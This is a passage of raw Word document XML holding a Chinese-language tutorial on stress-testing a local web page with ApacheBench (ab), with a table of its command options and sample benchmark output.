      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>好了，可以开始使用ab来测试了在终端输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> ab -n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">000 -c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>00 URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>地址。弹出以下内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>263525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>5913755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5342890" cy="2969895"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5342890" cy="2969895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w: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pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>通过上面的用法介绍可以得知，ab的使用方法就是输入如下DOS命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[可选的参数选项]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>需要进行压力测试的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>此外，我们再根据上面的用法介绍界面来详细了解每个参数选项的作用。</w:t>
      </w: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9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42" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>参数选项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>详细解释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rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>-n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>即requests，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>用于指定压力测试总共的执行次数。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rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>-c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>即concurrency，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>用于指定</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "http://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=46&amp;ch=0&amp;di=128&amp;fv=19&amp;is_app=0&amp;jk=1d4988a9148e80f1&amp;k=%D1%B9%C1%A6%B2%E2%CA%D4&amp;k0=%D1%B9%C1%A6%B2%E2%CA%D4&amp;kdi0=0&amp;luki=10&amp;mcpm=0&amp;n=10&amp;p=baidu&amp;q=97086099_cpr&amp;rb=0&amp;rs=1&amp;seller_id=1&amp;sid=f1808e14a988491d&amp;ssp2=1&amp;stid=0&amp;t=tpclicked3_hc&amp;td=1691595&amp;tu=u1691595&amp;u=http%3A%2F%2Fwww%2E365mini%2Ecom%2Fpage%2Fapache%2Dbenchmark%2Ehtm&amp;urlid=0" \t "_blank" </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>压力测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>的并发数。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-t</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>即timelimit，等待响应的最大时间(单位：秒)。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-b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>即windowsize，TCP发送/接收的缓冲大小(单位：字节)。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-p</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>即postfile，发送POST请求时需要上传的文件，此外还必须设置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="22"/>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="444444"/>
              </w:rPr>
              <w:t>-T</w:t>
            </w:r>
            <w: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-u</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>即putfile，发送PUT请求时需要上传的文件，此外还必须设置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="22"/>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="444444"/>
              </w:rPr>
              <w:t>-T</w:t>
            </w:r>
            <w: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-T</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>即content-type，用于设置Content-Type请求头信息，例如：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="22"/>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cstheme="minorBidi"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>application/x-www-form-urlencoded</w:t>
            </w:r>
            <w:r>
              <w:t>，默认值为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="22"/>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cstheme="minorBidi"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>text/plain</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-v</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>即verbosity，指定打印帮助信息的冗余级别。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-w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>以HTML表格形式打印结果。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-i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>使用HEAD请求代替GET请求。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-x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>插入字符串作为table标签的属性。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-y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>插入字符串作为tr标签的属性。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-z</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>插入字符串作为td标签的属性。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-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>添加cookie信息，例如："Apache=1234"(可以重复该参数选项以添加多个)。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-H</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>添加任意的请求头，例如："Accept-Encoding: gzip"，请求头将会添加在现有的多个请求头之后(可以重复该参数选项以添加多个)。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-A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>添加一个基本的网络认证信息，用户名和密码之间用英文冒号隔开。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-P</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>添加一个基本的代理认证信息，用户名和密码之间用英文冒号隔开。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-X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>指定使用的</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "http://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=46&amp;ch=0&amp;di=128&amp;fv=19&amp;is_app=0&amp;jk=1d4988a9148e80f1&amp;k=%B4%FA%C0%ED%B7%FE%CE%F1%C6%F7&amp;k0=%B4%FA%C0%ED%B7%FE%CE%F1%C6%F7&amp;kdi0=0&amp;luki=1&amp;mcpm=0&amp;n=10&amp;p=baidu&amp;q=97086099_cpr&amp;rb=0&amp;rs=1&amp;seller_id=1&amp;sid=f1808e14a988491d&amp;ssp2=1&amp;stid=0&amp;t=tpclicked3_hc&amp;td=1691595&amp;tu=u1691595&amp;u=http%3A%2F%2Fwww%2E365mini%2Ecom%2Fpage%2Fapache%2Dbenchmark%2Ehtm&amp;urlid=0" \t "_blank" </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>代理服务器</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:t>和端口号，例如:"126.10.10.3:88"。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-V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>打印版本号并退出。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-k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>使用HTTP的KeepAlive特性。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-d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>不显示百分比。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-S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>不显示预估和警告信息。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-g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>输出结果信息到gnuplot格式的文件中。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-r</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>指定接收到错误信息时不退出程序。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-e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>输出结果信息到CSV格式的文件中。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-h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>显示用法信息，其实就是</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="22"/>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="444444"/>
              </w:rPr>
              <w:t>ab -help</w:t>
            </w:r>
            <w:r>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>虽然ab可以配置的参数选项比较多，但是，一般情况下我们只需要使用形如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cstheme="minorBidi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ab -n 数字 -c 数字 url路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的命令即可。譬如，我们对位于本地Apache服务器上、URL为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://localhost:6356/Pages/redis/Login.aspx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的页面进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压力测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。测试总次数为1000，并发数为100(相当于100个用户同时访问，他们总共访问1000次)。我们输入DOS命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cstheme="minorBidi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ab -n 1000 -c 100 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://localhost:6356/Pages/redis/Login.aspx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下面我们对结果进行分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>D:\Program Files\Apache24\bin&gt;ab -n 1000 -c 100 http://localhost:6356/Pages/redi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>s/Login.aspx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>This is ApacheBench, Version 2.3 &lt;$Revision: 1826891 $&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Licensed to The Apache Software Foundation, http://www.apache.org/</w:t>
      </w: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r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Benchmarking localhost (be patient)</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100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200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300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400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500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600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700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800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900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1000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Finished 1000 requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="00B050"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00B050"/>
          <w:szCs w:val="21"/>
